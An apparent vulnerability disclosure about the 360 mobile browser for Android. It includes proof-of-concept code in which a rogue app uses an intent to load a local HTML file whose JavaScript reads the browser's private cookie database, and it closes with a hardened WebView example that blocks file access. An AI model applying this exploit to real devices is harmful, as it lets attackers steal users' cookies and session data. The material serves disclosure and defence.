A defect in the 360 mobile browser can leak sensitive user data

Source: Internet
Author: User

When an attacking app (whether malicious or not) sends the 360 browser a request to open a local page, script on that local page can read any of the data in the 360 browser that the attacking app wants, including cookie information. The theft does not require root. Once stolen, the data can be sent to a remote server.
360 mobile browser for Android, MD5: 5b252a142a492b34bd3253acb51882bd, September 22, 2013

    copyFile(); // customizable: release filehe.html to the SD card
    String url = "file://mnt/sdcard/filehe.html";
    Intent contIntent = new Intent();
    contIntent.setAction("android.intent.action.VIEW");
    contIntent.setData(Uri.parse(url));
    // Explicit intent aimed at the 360 browser's activity
    Intent intent = new Intent();
    intent.setClassName("com.qihoo.browser", "com.qihoo.browser.browserActivity");
    intent.setAction("android.intent.action.VIEW");
    intent.setData(Uri.parse(url));
    this.startActivity(intent);

 

The filehe.html file that obtains critical information:
    function getDatabase() {
        var request = false;
        if (window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if (request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        }
        xmlhttp = request;
        var prefix = "file://data/com.qihoo.browser/databases";
        var postfix = "/webviewCookiesChromium.db"; // the db that stores the cookies
        var path = prefix.concat(postfix);
        // read the contents of the local file
        xmlhttp.open("GET", path, false);
        xmlhttp.send(null);
        var ret = xmlhttp.responseText;
        return ret;
    }

 

Solution: Restrict access to the file domain
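
One way a browser activity could apply this restriction, shown as an added example that is not code from the original page or from the 360 browser. The class name HardenedBrowserActivity and the http/https allow-list are assumptions; the WebSettings calls are the standard Android WebView API (the two *FromFileURLs setters require API level 16 or later).

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.util.Locale;

// Hypothetical activity name, used for illustration only.
public class HardenedBrowserActivity extends Activity {
    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        webView = new WebView(this);
        setContentView(webView);

        WebSettings settings = webView.getSettings();
        settings.setAllowFileAccess(false);                  // no file:// loads at all
        settings.setAllowContentAccess(false);               // no content:// loads
        settings.setAllowFileAccessFromFileURLs(false);      // file page cannot XHR other files
        settings.setAllowUniversalAccessFromFileURLs(false); // file page cannot reach any origin

        loadFromIntent(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        loadFromIntent(intent); // same check when the activity is reused
    }

    // Allow-list check: only web schemes may arrive from another app.
    static boolean isAllowedScheme(Uri uri) {
        if (uri == null || uri.getScheme() == null) return false;
        String scheme = uri.getScheme().toLowerCase(Locale.ROOT);
        return scheme.equals("http") || scheme.equals("https");
    }

    private void loadFromIntent(Intent intent) {
        Uri uri = (intent == null) ? null : intent.getData();
        if (!isAllowedScheme(uri)) {
            return; // drop file://, content://, javascript: and anything unknown
        }
        webView.loadUrl(uri.toString());
    }
}
```

The intent check and the WebSettings flags are independent layers: the first stops an external app from handing the browser a local page, the second stops a local page from reading the app's private files if one is loaded anyway.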
